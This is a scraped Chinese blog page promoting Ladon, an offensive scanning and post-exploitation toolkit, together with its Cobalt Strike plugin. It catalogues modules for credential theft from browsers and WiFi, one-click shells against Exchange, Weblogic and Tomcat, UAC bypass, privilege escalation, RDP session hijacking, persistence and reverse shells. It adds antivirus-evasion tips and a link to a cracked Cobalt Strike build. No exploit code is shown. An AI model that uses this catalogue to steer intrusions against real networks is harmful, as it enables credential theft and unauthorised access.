    3.高危远程漏洞探测

    4.本机信息收集

    5.本机密码读取

    6.网络密码审计

    7.本地提权

    新增Beacon2System,将CS当前会话提升至system权限(该功能需当前会话处于admin权限)。Priviledges特权启用(一般情况下提权EXP会自动复制相应特权以达到提权的目的,通过相 关EXP上线的CS继承其权限以及特权,但是有时候需要在CS执行其它程序,而其它程序需要操作其它功能,而那些功能使用前提需要相应特权),特权说明:https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants?redirectedfrom=MSDN

    8.其它功能

    1.NET测试,用于测试CS是否可加载.NET程序集,Win10_20H2系统的Defender或相关杀软,会对CS加载.NET程序进行拦截,若该功能可正常加载,再尝试使用Ladon,若无法加载,其它.NET写的也不需要测试了,因为你使用的话会和使用Mimikat一样会导致CS下线。一个小技巧,使用CS高危功能时最好多开一个会话,以免CS突然下线让你懵B。

    9.CMD渗透信息收集

    当然,如果你熟悉Ladon命令的可以直接在Beacon上执行相应命令即可,如使用Ladon GetID命令查看目标机器名、机器ID、CPUID、硬盘ID、MAC地址等信息,主要用于区分一些大内网同名机器或其它用途;使用Ladon 192.168.1.8/24 MS17010探测C段机器是否存在MS17010漏洞。若是你不熟悉可以使用GUI右键菜单(打X的选项代表右键暂未支持),为了方便新人或不太熟的人,实际上时间久了,我也会忘记Ladon的功能,也需要右键GUI,毕竟上百功能。

    CS插件

    =======================
    Ladon 9.1.1 巨龙拉冬
    CS右键174个功能模块
    Update 2021.12.11

    0x001 网络资产收集

    1.多协议探测存活主机
    2.多协议探测存活IP
    3.仅ICMP探测存活(快)
    4.系统Ping探测存活
    5.Oxid多网卡主机探测
    6.DNS多网卡主机探测
    7.多协议操作系统探测
    8.网站、标题、Banner
    9.智能网站CMS识别
    10.常见端口服务探测
    11.Shiro网站探测
    12.Cisco设备探测
    13.LDAP服务器探测
    14.FTP服务器探测
    15.枚举MSSQL服务器
    16.枚举共享资源

    0x002 系统信息探测

    1.SMB探测系统信息
    2.WMI探测系统信息
    3.NBT探测系统信息
    4.RDP探测系统信息
    5.SNMP探测系统信息
    6.MSSQL探测系统信息
    7.WINRM探测系统信息
    8.Exchange探测系统信息

    0x003 远程漏洞检测

    1.SMB永恒之蓝检测
    2.SMB永恒之黑检测
    3.Struts2漏洞检测
    4.Weblogic漏洞检测
    5.PhpStudy后门检测
    6.ActiveMQ漏洞检测
    7.Tomcat漏洞检测

    0x004 本机信息收集

    1.查看本机IP(内外网)
    2.当前用户、特权信息
    3.GUID、CPUID、DiskID
    4.基础信息(仅cmd获取)
    5.基础信息(含wmi获取)
    6.获取命令行参数
    7.获取进程详细信息
    8.查看IE代理信息
    9.查看本机命名管道
    10.查看3389远程连接
    11.查看USB使用记录
    12.查看管理员组用户
    13.查看最近访问文件
    14.查看安装.NET版本
    15.查看PowerShell版本
    16.查看已安装程序版本
    17.查看OS倍数.NET版本
    18.列全盘目录(RAR打包)
    19.查看注册表启动项、
    20.查看系统劫持DLL

    0x005 本机密码读取

    1 Chrome浏览器密码
    2 Firefox浏览器密码
    3 CocCoc浏览器密码
    4 Edge浏览器密码
    5 Wifi连接密码
    6 IIS站点密码
    7 FileZilla FTP密码
    8 VPN连接密码 CVE-2021-36934

    0x006 一键GetShell

    1.Exchange CVE-2020-0688
    2.Weblogic GetShell
    3.Tomcat GetShell

    0x007 网络密码嗅探

    1.FTP密码嗅探
    2.HTTP密码嗅探

    0x008 网络密码审计

    1.445端口SMB密码审计(Windows)
    2.135端口WMI密码审计(Windows)
    3.445端口SMB-HASH密码审计(Windows)
    4.135端口WMI-HASH密码审计(Windows)
    5.139端口NBT密码审计(Windows)
    6.5985端口Winrm密码审计(Windows)
    7.21端口FTP密码审计(多平台)
    8.5900端口VNC密码审计(多平台)
    9.389端口LDAP密码审计(Windows)
    10.1521端口Oracle数据库密码审计(多平台)
    11.1433端口MSSQL数据库密码审计(Windows)
    12.3306端口MYSQL数据库密码审计(多平台)
    13.7001端口Weblogic后台密码审计(多平台)
    14.Web端口Tomcat后台密码审计(多平台)
    15.Web端口401基础认证密码审计(多平台)
    16.22端口SSH密码审计(Linux_多平台)
    17.网络摄像头密码审计(401认证)
    18.WEB网站后台目录/页面存活扫描

    0x009 本机执行

    1.sc服务执行(system权限)
    2.at计划任务(system权限)
    3.Runas(模拟用户执行)
    4.RunPS(无powershell执行)
    5.ForExec(循环执行命令)

    0x010 远程执行

    1.WinrmExec
    2.SshExec
    3.SmbExec
    4.PsExec
    5.AtExec
    6.WmiExec
    7.WmiExec2
    8.WinrmExec
    9.JspShell
    10.AspShell
    11.AspxShell
    12.PhpShell

    0x011 本地提权

    1.BypassUac
    1.eventvwr
    2.fodhelper
    3.computerdefaults
    4.sdclt
    5.slui

    2.BypassUac2
    3.Admin2System
    4.System2Admin
    5.Runas
    6.ms16135 X64
    7.BadPotato
    8.SweetPotato
    9.RDPHijack
    10.CVE-2021-1675
    11.Priviledges
    0.SetPriviledge
    1.SetDebugPriv
    2.SetAuditPriv
    3.SetImpersonate
    4.SetCreateToken
    5.SetAssignPrimaryToken
    12.Beacon2System

    0x012 自启动

    1.注册表自启动
    2.服务启动项

    0x013 3389远程桌面

    1.一键开启3389
    2.查看3389远程连接
    3.查看管理员组用户
    4.激活Administrator
    5.激活用户Guest
    6.远程桌面会话劫持

    0x014 远程下载

    1.Http文件下载
    2.FTP文件下载

    0x015 域(DC、LDAP)

    1.域内机器信息获取(域内)
    2.389端口LDAP服务器探测
    3.389端口LDAP密码审计
    4.CVE-2020-1472域控提权

    0x016 端口转发

    1.netsh(系统自带)
    2.PortTran

    0x017 MSF/NC联动

    1.Shell_bind_tcp
    2.Shell_reverse_tcp
    3.Met_reverse_http
    4.Met_reverse_https
    5.Shell_reverse_icmp
    6.Shell_reverse_dns

    0x018 其它功能

    1.内存加载.NET测试
    2.PowerShell测试版本
    3.Win2008启用.net3.5
    4.网站HTML源码查看
    5.网站域名解析IP
    6.PC机器名解析IP

    以下为系统自带命令,Ladon无法加载也不影响

    0x019 CMD命令信息收集

    0.查看系统信息
    1.查看.NET版本
    2.查看保存凭证
    3.查看Defender
    4.查看当前特权
    5.查看当前WIFI
    6.查看机器GUID
    7.查看机器名称
    8.查看RDP端口
    9.查看进程列表
    10.查看服务列表
    11.查看安装程序
    12.查看启动列表
    13.查看防火墙规则
    14.查看路由表信息
    15.查看网络连接
    16.用户操作
    1.查看当前用户
    2.查看本机管理员
    3.查看本机用户
    4.查看域管理员
    5.查看域用户
    6.激活Administrator
    7.激活Guest
    8.Guest加管理员组
    9.禁用Administrator
    10.禁用Guest
    17.查看机器列表
    18.查看补丁信息

    0x020 PowerShell信息收集

    1.查看PowerShell版本
    2.查看当前登陆用户
    …其它功能下版本更新

    为什么选11号发布?

    熟悉我的人应该知道911的意义吧,Ladon也刚好更新到9.1.1版本,911版本计划要添加不少功能,但要等到9月11才发布,就太遥远了,今天刚好11,那就今天发布吧,双十二虽比较好听,但还911不沾边。此次插件改动较大,时间也比较急,功能也未来得及全测,大家在使用过程中发现功能问题,都可以截图后台或小密圈反馈。

    声明

    工具仅供安全研究或授权渗透,非法用途后果自负。

    CS下载

    CS 3.12 3.13 4.3 4.4 K8破解版
    000为原始试用版本(部分未找到,大家可以提供给我更新)
    https://github.com/k8gege/Aggressor/releases/tag/cs

    Ladon下载

    LadonGo 3.8: https://github.com/k8gege/LadonGo
    PowerLadon: https://github.com/k8gege/PowerLadon
    历史版本: http://github.com/k8gege/Ladon/releases
    7.0版本:http://k8gege.org/Download
    9.1.1版本:K8小密圈

    展开全文
  • Ladon for Kali 2019

    千次阅读 2019-12-15 01:27:55
    Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...

    前言

    无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。
    但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。
    漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞?
    对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。
    因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模块快速检测新出漏洞。

    程序简介

    Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置40个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH(Linux主机)、VNC、Windows密码(IPC、WMI、SMB)、Weblogic后台、Rar压缩包密码等,Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

    使用简单

    虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手
    只需一或两个参数就可用90%的功能,一个模块相当于一个新工具

    测试环境

    Kali 2019.4 x64
    Ubuntu 18.04 x64

    安装mono

    linux下需mono运行环境,Kali和Ubuntu安装命令通用。
    其它系统未进行测试,喜欢用其它Linux系统自行测试。

    apt install mono-runtime
    

    运行Ladon

    mono Ladon OnlinePC
    

    可用功能

    由于mono的兼容性问题,不保证Linux下所有功能均可用
    就对于Ladon功能的测试来看Kali的兼容性要比Ubuntu好
    测试发现有些功能的稳定性以及速度没有Windows系统快
    未列功能系未测试或暂不可用功能,使用前请先看说明
    在Kali 2019.4下测试,Ladon支持以下所列的27种功能

    ID模块说明
    1WebDirWeb目录扫描
    2UrlScanURL域名扫描(不验IP)
    3PhpStudyPocPhpStudy后门扫描
    4WebScanWeb信息扫描
    5MysqlScanMysql口令检测
    6OracleScanOracle口令检测
    7VncScanVnc口令检测
    8HttpDownLoadHttp下载
    9FtpDownLoadFtp下载
    10WhatCMS75种CMS识别
    11FtpScanFtp口令检测
    12PortScanPortScan端口扫描
    13SmbScanSmb口令检测
    14SameWeb站点域名扫描(验证IP)
    15MS17010MS17010漏洞扫描
    16OnlinePC存活主机扫描
    17OnlineIP存活主机IP扫描
    18HostIP主机名解析IP
    19DomainIP子域名解析IP
    20EnBase64批量Base64密码加密
    21DeBase64批量Base64密码解密
    22EnHex批量Hex密码加密
    23DeHex批量Hex密码解密
    24OsScan系统版本探测
    25SubDomain子域名爆破
    26SshScanSSH口令检测
    27*.ps1无PowerShell执行脚本

    暂不支持功能

    =============================================
    Struts2Poc X不支持
    TomcatScan X不支持
    HttpBasicScan X不支持,只能检测是否401认证URL,无法爆破
    WeblogicPoc X 竟然不支持(Win下mono也不支持,显然mono问题)
    MssqlScan X不支持只能扫到开放端口
    IpcScan X不支持(因为调用cmd命令)

    MS17010漏洞扫描

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-A0gVWVu6-1576344145195)(https://k8gege.org/k8img/Ladon/kali/Kali_MS17010.gif)]

    PortScan端口扫描

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NvOS4RGr-1576344145197)(https://k8gege.org/k8img/Ladon/kali/Kali_PortScan.gif)]

    存活主机扫描

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OEJ24oTA-1576344145199)(https://k8gege.org/k8img/Ladon/kali/Kali_OnlinePC.gif)]

    存活主机IP扫描

    可能IP需要用于其它用途,故提供只输出IP功能
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e03dywwu-1576344145201)(https://k8gege.org/k8img/Ladon/kali/Kali_OnlineIP.gif)]

    Ftp口令检测

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1CTcWj7J-1576344145202)(https://k8gege.org/k8img/Ladon/kali/Kali_FtpScan.gif)]

    Smb口令检测

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vyvyKIdq-1576344145204)(https://k8gege.org/k8img/Ladon/kali/Kali_SmbScan.gif)]

    75种CMS识别

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-47DwbczY-1576344145206)(https://k8gege.org/k8img/Ladon/kali/Kali_WhatCMS.gif)]

    子域名爆破

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SxPWsce5-1576344145228)(https://k8gege.org/k8img/Ladon/kali/Kali_SubDomain.gif)]

    系统版本探测

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yQFqVsVk-1576344145231)(https://k8gege.org/k8img/Ladon/kali/Kali_OsScan.gif)]

    主机名解析IP

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7NJMhucD-1576344145233)(https://k8gege.org/k8img/Ladon/kali/Kali_HostIP.gif)]

    子域名解析IP

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oMQjcOk9-1576344145234)(https://k8gege.org/k8img/Ladon/kali/Kali_DomainIP.gif)]

    SSH口令检测

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-f4Ui9m1v-1576344145235)(https://k8gege.org/k8img/Ladon/kali/Kali_SshScan.gif)]

    加载PowerShell插件

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PYiQvItC-1576344145236)(https://k8gege.org/k8img/Ladon/kali/kali_ps1.PNG)]

    PhpStudy后门扫描

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Gnf6WFMa-1576344145238)(https://k8gege.org/k8img/Ladon/kali/kali_PhpStudyPoc.gif)]

    URL域名扫描(不验IP)

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5owjyGDo-1576344145260)(https://k8gege.org/k8img/Ladon/kali/kali_UrlScan.gif)]

    站点域名扫描(验证IP)

    Web信息扫描

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X1PA1221-1576344145263)(https://k8gege.org/k8img/Ladon/kali/kali_WebScan.gif)]

    Web目录扫描

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rkcbsGRX-1576344145264)(https://k8gege.org/k8img/Ladon/kali/kali_WebDir.gif)]

    Mysql口令检测

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gmbRTXO5-1576344145265)(https://k8gege.org/k8img/Ladon/kali/kali_MysqlScan.gif)]

    Oracle口令检测

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cEDK9fz2-1576344145266)(https://k8gege.org/k8img/Ladon/kali/kali_OracleScan.gif)]

    Vnc口令检测

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iiFIsB3y-1576344145268)(https://k8gege.org/k8img/Ladon/kali/kali_VncScan.gif)]

    Http/Ftp下载

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wYfvmo6I-1576344145295)(https://k8gege.org/k8img/Ladon/kali/kali_Http_Ftp_Download.PNG)]

    Base64密码加解密

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3SYeYVy5-1576344145306)(https://k8gege.org/k8img/Ladon/kali/Kali_Base64.gif)]

    Hex密码加解密

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mcP1o3uB-1576344145308)(https://k8gege.org/k8img/Ladon/kali/Kali_Hex.gif)]

    使用说明

    ID主题URL
    1Ladon文档主页https://github.com/k8gege/Ladon/wiki
    2基础用法详解https://github.com/k8gege/Ladon/wiki/Ladon-Usage
    3Cobalt Strikehttps://github.com/k8gege/Aggressor
    4Exp生成器使用https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
    5高度自定义插件https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
    6外部模块参考https://github.com/k8gege/K8CScan/wiki
    7PowerLadonhttps://github.com/k8gege/powerladon
    8PythonLadonhttps://github.com/k8gege/PyLadon
    9KaliLadonhttps://github.com/k8gege/KaliLadon
    10漏洞演示视频https://github.com/k8gege/K8CScan/tree/master/Video

    源码编译

    git clone https://github.com/k8gege/Ladon.git

    使用VS2012或以上版本分别编译.net 3.5、4.0版本EXE

    成品下载

    https://github.com/k8gege/Ladon/releases

    Win7/2008或安装.net 2.x 3.x系统可使用Ladon.exe

    Win8-win10或安装.net 4.x系统可使用Ladon40.exe

    展开全文
  • Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置...
  • 召唤神龙Ladon强化Cobalt Strike

    千次阅读 2019-11-21 19:50:23
    Ladon5.5 20191109 wiki update 20191114 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KDgZHRa7-1574336752447)(https://img.shields.io/badge/Ladon-5.5-yellowgreen)] [外链图片...
  • 执行复杂命令 对于Ladon未支持的功能,可能需复杂的多语句命令完成,命令中的双引号以及其它特殊字符CS转义比较麻烦,加上现在XP、2003系统几乎淘汰,主流基本都是WIN7以上系统,所以推荐大家使用PowerShell比较...
  • Ladon简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。...
  • ladon - 采用Go编写的访问控制策略SDK:微服务和IoT时代的授权。 受AWS IAM策略的启发。
  • 给定一行文本,能够从海量的正则表达式中快速查询出命中了哪些正则,还可以返回该正则附加的一些数据。下方有简单的性能压测,5W个正则,匹配上只需要1ms.
  • Ladon MS17010 Exploit for PowerShell

    千次阅读 2019-12-15 13:10:02
    Win Ladon Kali PowerShell MS17010EXP #Ladon Moudle MS17010 EXPLOIT #Using Invoke-EternalBlue.ps1 #Author k8gege function Ladon (){ param([string]$ip) #write-output $ip $result=-Join("MS17010EXP ",$...
  • Ladon8.9更新功能 20210920 [+]CmdDll Windows 0day漏洞通用DLL注入生成器,生成的DLL仅5KB,非常适合0day加载 2021.9.15 [u]webscan CS保留 [u]CmdDll 去除黑框 2021.9.14 [+]CVE-2021-40444 Microsoft MSHTML远程...
  • 之后在 V 站上看到有大佬推荐了 Ladon,于是我抽空折腾了下。 文中我将使用 Gin 和 Ladon 实现一个简易的 ACL 接口,通过向接口发送数据判断某用户是否具有操作资源的权限。 简介 Ladon[1] 是一个用于控制访问策略的...
  • Ladon的用法

    千次阅读 2020-05-24 17:54:34
    Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...
  • 一、用ladon框架封装Python为Webservice接口功能实现的同时,希望将接口开放给别人,而封装python接口的一个再简单不过的框架Ladon,而且提供不同的协议,包括SOAP和Json等格式的接口。本篇紧接着上上篇(Django部署)...
  • 本文讲述什么是加密、加密解密算法入门、自定义加密算法实现、CS免杀使用的异或算法、特工摩斯密码,以及Ladon8.0加密解密算法演示。 什么是加密 出于信息保密的目的,在信息传输或存储中,采用密码技术对需要保密的...
  • 使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本 实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网) 将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB 远程加载MS17010...
  • 使用Ladon8.0 GUI版EnCode模块里的Base64Encode加密 Example Example usage for eventvwr bypass to launch calc.exe Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl Example usage for fodhelper bypass ...
  • Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置...
  • Ladon for Cobalt Strike Ladon For Cobalt Strike Ladon 7.7 For Cobalt Strike 中文GUI 信息收集/存活主机/服务识别/端口扫描 高危漏洞检测 网络服务密码爆破 远程执行/横向移动 MSF、NC联动/一键反弹 程序简介 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 523
精华内容 209
关键字:

ladon

友情链接: ArrowSample.zip